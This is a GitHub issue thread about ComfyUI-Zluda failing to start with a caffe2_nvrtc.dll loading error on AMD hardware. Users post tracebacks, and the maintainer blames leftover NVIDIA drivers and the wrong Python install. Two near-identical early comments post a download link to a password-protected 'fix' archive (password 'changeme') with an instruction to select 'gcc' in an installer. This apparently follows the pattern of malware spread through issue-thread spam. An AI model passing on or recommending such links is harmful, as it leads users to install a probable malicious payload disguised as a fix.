### ISSUE TITLE
Unable to run start.bat

### ISSUE THREAD

**Issue by grumblefoot** [patientx/ComfyUI-Zluda#21]
### Expected Behavior

Start ComfyUI

### Actual Behavior

terminal opens, then closes. Program does not start
[comfyui.log](https://github.com/user-attachments/files/16763209/comfyui.log)

### Steps to Reproduce

Ensure all requirements are met. Ensure not using Windows Store Python. Clone a fresh copy of the Repo. install with install.bat. The program fails to start after install finished

### Debug Logs

```powershell
## ComfyUI-Manager: installing dependencies. (GitPython)
[2024-08-27 06:55] ## ComfyUI-Manager: installing dependencies done.
[2024-08-27 06:55] ** ComfyUI startup time: 2024-08-27 06:55:34.454818
[2024-08-27 06:55] ** Platform: Windows
[2024-08-27 06:55] ** Python version: 3.10.11 (tags/v3.10.11:7d4cc5a, Apr  5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)]
[2024-08-27 06:55] ** Python executable: D:\AIProjects\tmp\ComfyUI-Zluda\venv\Scripts\python.exe
[2024-08-27 06:55] ** ComfyUI Path: D:\AIProjects\tmp\ComfyUI-Zluda
[2024-08-27 06:55] ** Log path: D:\AIProjects\tmp\ComfyUI-Zluda\comfyui.log
[2024-08-27 06:55] 
Prestartup times for custom nodes:
[2024-08-27 06:55]   11.0 seconds: D:\AIProjects\tmp\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
[2024-08-27 06:55] 
Traceback (most recent call last):
[2024-08-27 06:55]   File "D:\AIProjects\tmp\ComfyUI-Zluda\main.py", line 83, in <module>
[2024-08-27 06:55]     import comfy.utils
[2024-08-27 06:55]   File "D:\AIProjects\tmp\ComfyUI-Zluda\comfy\utils.py", line 20, in <module>
[2024-08-27 06:55]     import torch
[2024-08-27 06:55]   File "D:\AIProjects\tmp\ComfyUI-Zluda\venv\lib\site-packages\torch\__init__.py", line 141, in <module>
[2024-08-27 06:55]     raise err
[2024-08-27 06:55] OSError: [WinError 126] The specified module could not be found. Error loading "D:\AIProjects\tmp\ComfyUI-Zluda\venv\lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.
```

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by patientx** [comment]
Problems with "caffe2_nvrtc.dll" : if you are sure you properly installed hip and can see it on path, please DON'T use python from windows store, use the link provided or 3.11 from the official website. After uninstalling python from windows store and installing the one from the website, be sure the delete venv folder, and run install.bat once again.

**Comment by Max-Phoenix-Ryan** [comment]
Hi I've also got the same issue as follows; been trying to install the ComfyUI-Zluda and thought I had got it sorted, but just can't get it to run after multiple attempts, I keep getting as far as the following;

C:\Users\MaxPh\ComfyUI-Zluda>C:\Users\MaxPh\ComfyUI-Zluda\start.bat
*** Checking and updating to new version if possible
Already up to date.

[START] Security scan
[DONE] Security scan
## ComfyUI-Manager: installing dependencies done.
** ComfyUI startup time: 2024-08-18 20:36:38.503017
** Platform: Windows
** Python version: 3.11.9 (tags/v3.11.9:de54cf5, Apr  2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)]
** Python executable: C:\Users\MaxPh\ComfyUI-Zluda\venv\Scripts\python.exe
** ComfyUI Path: C:\Users\MaxPh\ComfyUI-Zluda
** Log path: C:\Users\MaxPh\ComfyUI-Zluda\comfyui.log

Prestartup times for custom nodes:
   1.5 seconds: C:\Users\MaxPh\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager

Traceback (most recent call last):
  File "C:\Users\MaxPh\ComfyUI-Zluda\main.py", line 83, in 
    import comfy.utils
  File "C:\Users\MaxPh\ComfyUI-Zluda\comfy\utils.py", line 20, in 
    import torch
  File "C:\Users\MaxPh\ComfyUI-Zluda\venv\Lib\site-packages\torch\__init__.py", line 141, in 
    raise err
OSError: [WinError 126] The specified module could not be found. Error loading "C:\Users\MaxPh\ComfyUI-Zluda\venv\Lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.

C:\Users\MaxPh\ComfyUI-Zluda>

I have gone to the folder and can confirm the so called missing file is in fact in the folder and is 16kb in size.

I have tried re-installing, patching, ect.. and always get to the same point, any assistance would be most appreciated.

Quick note, the PC spec is;

AMD Ryzen 9 7950X3D 16-Core Processor   4.20 GHz
Installed RAM 64.0 GB (63.1 GB usable)
64-bit operating system, x64-based processor
Windows 11 Pro
AMD Radeon RX 7900 XTX 24gb graphics card

I then tried reinstalling Python due the the following comment in the readme:

Problems with "caffe2_nvrtc.dll" : if you are sure you properly installed hip and can see it on path, please DON'T use python from windows store, use the link provided or 3.11 from the official website

I did install from the Python website but it was version 3.11.9 so I uninstalled this and instead installed version 3.10.11 as this was first option given in the notes.  I then deleted the venv folder and re-ran the install.bat.

After doing all of this I still have the same error when trying to run;

C:\Users\MaxPh\ComfyUI-Zluda>start.bat
*** Checking and updating to new version if possible
Already up to date.

[START] Security scan
[DONE] Security scan
## ComfyUI-Manager: installing dependencies done.
** ComfyUI startup time: 2024-08-18 23:43:22.591863
** Platform: Windows
** Python version: 3.10.11 (tags/v3.10.11:7d4cc5a, Apr  5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)]
** Python executable: C:\Users\MaxPh\ComfyUI-Zluda\venv\Scripts\python.exe
** ComfyUI Path: C:\Users\MaxPh\ComfyUI-Zluda
** Log path: C:\Users\MaxPh\ComfyUI-Zluda\comfyui.log

Prestartup times for custom nodes:
   1.5 seconds: C:\Users\MaxPh\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager

Traceback (most recent call last):
  File "C:\Users\MaxPh\ComfyUI-Zluda\main.py", line 83, in 
    import comfy.utils
  File "C:\Users\MaxPh\ComfyUI-Zluda\comfy\utils.py", line 20, in 
    import torch
  File "C:\Users\MaxPh\ComfyUI-Zluda\venv\lib\site-packages\torch\__init__.py", line 141, in 
    raise err
OSError: [WinError 126] The specified module could not be found. Error loading "C:\Users\MaxPh\ComfyUI-Zluda\venv\lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.

C:\Users\MaxPh\ComfyUI-Zluda>

So I tried again and this time installed Python 3.11.0 

No matter what I try, or how many times I uninstall and re-install software I keep getting the same result when trying to run could it be that the GPU I have is too big? (AMD Radeon RX 7900 XTX 24gb graphics card)

I've tried everything on the main page, checked file sizes, updated, started from scratch, nothing seems to work.

how do I check hip 5.7 is installed and what would be the correct path? I'm not that great with software and could really do with some more detailed guidance which with luck would help others with the same problem, as I'm sure there are more than two of us with the same start up issues.

Thanks in advance.

**Comment by patientx** [comment]
this is an old problem and certainly you two aren't the first the encounter it. 
Check this old issue for example :
https://github.com/patientx/ComfyUI-Zluda/issues/7

**Comment by nvdhaar77** [comment]
Also have that problem, after putting caffe2_nvrtc.dll in a dependency checker, it seems it misses nvcudu.dll

but not sure why it want a nvidea driver for amd cards

**Comment by patientx** [comment]
If you had a nvidia gpu in the past its drivers remnants might be interfering

**Comment by nvdhaar77** [comment]
my last nvideo card long time ago was a 980IT, my last 10+ windows install's had no nvidea hardware in it, so i'm stuck why it want to load that cuda driver.

at the moment i has able to do a manual install of comfyui with --directml support that seem to work mostly with my rx-9800-xtx

**Comment by zarigata** [comment]
> Hi I've also got the same issue as follows; been trying to install the ComfyUI-Zluda and thought I had got it sorted, but just can't get it to run after multiple attempts, I keep getting as far as the following;
> 
> C:\Users\MaxPh\ComfyUI-Zluda>C:\Users\MaxPh\ComfyUI-Zluda\start.bat *** Checking and updating to new version if possible Already up to date.
> 
> [START] Security scan [DONE] Security scan
> 
> ## ComfyUI-Manager: installing dependencies done.
> ** ComfyUI startup time: 2024-08-18 20:36:38.503017 ** Platform: Windows ** Python version: 3.11.9 (tags/v3.11.9:de54cf5, Apr 2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)] ** Python executable: C:\Users\MaxPh\ComfyUI-Zluda\venv\Scripts\python.exe ** ComfyUI Path: C:\Users\MaxPh\ComfyUI-Zluda ** Log path: C:\Users\MaxPh\ComfyUI-Zluda\comfyui.log
> 
> Prestartup times for custom nodes: 1.5 seconds: C:\Users\MaxPh\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
> 
> Traceback (most recent call last): File "C:\Users\MaxPh\ComfyUI-Zluda\main.py", line 83, in import comfy.utils File "C:\Users\MaxPh\ComfyUI-Zluda\comfy\utils.py", line 20, in import torch File "C:\Users\MaxPh\ComfyUI-Zluda\venv\Lib\site-packages\torch__init__.py", line 141, in raise err OSError: [WinError 126] The specified module could not be found. Error loading "C:\Users\MaxPh\ComfyUI-Zluda\venv\Lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.
> 
> C:\Users\MaxPh\ComfyUI-Zluda>
> 
> I have gone to the folder and can confirm the so called missing file is in fact in the folder and is 16kb in size.
> 
> I have tried re-installing, patching, ect.. and always get to the same point, any assistance would be most appreciated.
> 
> Quick note, the PC spec is;
> 
> AMD Ryzen 9 7950X3D 16-Core Processor 4.20 GHz Installed RAM 64.0 GB (63.1 GB usable) 64-bit operating system, x64-based processor Windows 11 Pro AMD Radeon RX 7900 XTX 24gb graphics card
> 
> I then tried reinstalling Python due the the following comment in the readme:
> 
> Problems with "caffe2_nvrtc.dll" : if you are sure you properly installed hip and can see it on path, please DON'T use python from windows store, use the link provided or 3.11 from the official website
> 
> I did install from the Python website but it was version 3.11.9 so I uninstalled this and instead installed version 3.10.11 as this was first option given in the notes. I then deleted the venv folder and re-ran the install.bat.
> 
> After doing all of this I still have the same error when trying to run;
> 
> C:\Users\MaxPh\ComfyUI-Zluda>start.bat *** Checking and updating to new version if possible Already up to date.
> 
> [START] Security scan [DONE] Security scan
> 
> ## ComfyUI-Manager: installing dependencies done.
> ** ComfyUI startup time: 2024-08-18 23:43:22.591863 ** Platform: Windows ** Python version: 3.10.11 (tags/v3.10.11:7d4cc5a, Apr 5 2023, 00:38:17) [MSC v.1929 64 bit (AMD64)] ** Python executable: C:\Users\MaxPh\ComfyUI-Zluda\venv\Scripts\python.exe ** ComfyUI Path: C:\Users\MaxPh\ComfyUI-Zluda ** Log path: C:\Users\MaxPh\ComfyUI-Zluda\comfyui.log
> 
> Prestartup times for custom nodes: 1.5 seconds: C:\Users\MaxPh\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
> 
> Traceback (most recent call last): File "C:\Users\MaxPh\ComfyUI-Zluda\main.py", line 83, in import comfy.utils File "C:\Users\MaxPh\ComfyUI-Zluda\comfy\utils.py", line 20, in import torch File "C:\Users\MaxPh\ComfyUI-Zluda\venv\lib\site-packages\torch__init__.py", line 141, in raise err OSError: [WinError 126] The specified module could not be found. Error loading "C:\Users\MaxPh\ComfyUI-Zluda\venv\lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.
> 
> C:\Users\MaxPh\ComfyUI-Zluda>
> 
> So I tried again and this time installed Python 3.11.0
> 
> No matter what I try, or how many times I uninstall and re-install software I keep getting the same result when trying to run could it be that the GPU I have is too big? (AMD Radeon RX 7900 XTX 24gb graphics card)
> 
> I've tried everything on the main page, checked file sizes, updated, started from scratch, nothing seems to work.
> 
> how do I check hip 5.7 is installed and what would be the correct path? I'm not that great with software and could really do with some more detailed guidance which with luck would help others with the same problem, as I'm sure there are more than two of us with the same start up issues.
> 
> Thanks in advance.

same GPU and problem.... weird, ive reinstalled python and zluda, but no no avail

**Comment by waldolin** [comment]
i have a suggestion about a file of .bat  that do not update. the other one can name update.bat
It will not make some problem for using

i have used it successful, but when run start.bat
and update and fail to open

*** Checking and updating to new version if possible
Already up to date.

[START] Security scan
[DONE] Security scan
## ComfyUI-Manager: installing dependencies done.
** ComfyUI startup time: 2024-10-09 11:37:29.301167
** Platform: Windows
** Python version: 3.10.6 (tags/v3.10.6:9c7b4bd, Aug  1 2022, 21:53:49) [MSC v.1932 64 bit (AMD64)]
** Python executable: D:\github\ComfyUI-Zluda\venv\Scripts\python.exe
** ComfyUI Path: D:\github\ComfyUI-Zluda
** Log path: D:\github\ComfyUI-Zluda\comfyui.log

Prestartup times for custom nodes:
   3.4 seconds: D:\github\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager

Traceback (most recent call last):
  File "D:\github\ComfyUI-Zluda\main.py", line 88, in <module>
    import comfy.utils
  File "D:\github\ComfyUI-Zluda\comfy\utils.py", line 20, in <module>
    import torch
  File "D:\github\ComfyUI-Zluda\venv\lib\site-packages\torch\__init__.py", line 141, in <module>
    raise err
OSError: [WinError 126] 找不到指定的模組。 Error loading "D:\github\ComfyUI-Zluda\venv\lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.
請按任意鍵繼續 . . .

**Comment by patientx** [comment]
> i have a suggestion about a file of .bat that do not update. the other one can name update.bat It will not make some problem for using without update.
> 
> i have used it successful, but when run start.bat and update and fail to open I delete the venv and install it again still the same. It will make me down. I delete comfy folder all together and start from zero. and still fail.
> 
> OK. I fixed it NOW. add C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v12.5\bin to enviroment path Open "System Properties" > "Environment Variables". Click "New" in the "System Variables" section, set the variable name to COMFYUI_PATH, and set the variable value to D:\github\ComfyUI-Zluda. Click OK and restart the system to apply the changes.
> 
> *** Checking and updating to new version if possible Already up to date.
> 
> [START] Security scan [DONE] Security scan
> 
> ## ComfyUI-Manager: installing dependencies done.
> ** ComfyUI startup time: 2024-10-09 11:37:29.301167 ** Platform: Windows ** Python version: 3.10.6 (tags/v3.10.6:9c7b4bd, Aug 1 2022, 21:53:49) [MSC v.1932 64 bit (AMD64)] ** Python executable: D:\github\ComfyUI-Zluda\venv\Scripts\python.exe ** ComfyUI Path: D:\github\ComfyUI-Zluda ** Log path: D:\github\ComfyUI-Zluda\comfyui.log
> 
> Prestartup times for custom nodes: 3.4 seconds: D:\github\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
> 
> Traceback (most recent call last): File "D:\github\ComfyUI-Zluda\main.py", line 88, in import comfy.utils File "D:\github\ComfyUI-Zluda\comfy\utils.py", line 20, in import torch File "D:\github\ComfyUI-Zluda\venv\lib\site-packages\torch__init__.py", line 141, in raise err OSError: [WinError 126] 找不到指定的模組。 Error loading "D:\github\ComfyUI-Zluda\venv\lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies. 請按任意鍵繼續 . . .

As usual , people don't read. DON'T LEAVE ANY NVIDIA APPS INSTALLED. Why do you still have cuda if you are using amd gpu ?

**Comment by waldolin** [comment]
I ask chatgpt this problem, and find out i have been installed before.

**Comment by patientx** [comment]
Don't leave ANY PREVIOUS NVIDIA DRIVER, FOLLOW THE STEPS, INSTALL THE CORRECT VER. of the apps. This issue has been around for over a year now and in the end if you follow the instructions everything works out. Sometimes people insist they didn't miss a step or don't have any other driver / app that would cause this but I myself assisted a few of them via remote connection and EVERYTIME it turns out they didn't do one instruction. Closing this now.

**Comment by waldolin** [comment]
>Don't leave ANY PREVIOUS NVIDIA DRIVER, FOLLOW THE STEPS, INSTALL THE CORRECT VER. of the apps. This issue has been around for over a year now and in the end if you follow the instructions everything works out. Sometimes people insist they didn't miss a step or don't have any other driver / app that would cause this but I myself assisted a few of them via remote connection and EVERYTIME it turns out they didn't do one instruction. Closing this now.

Well, I have a 1050 2G for testing.  It is not used only when I need to test.  That's the reason!
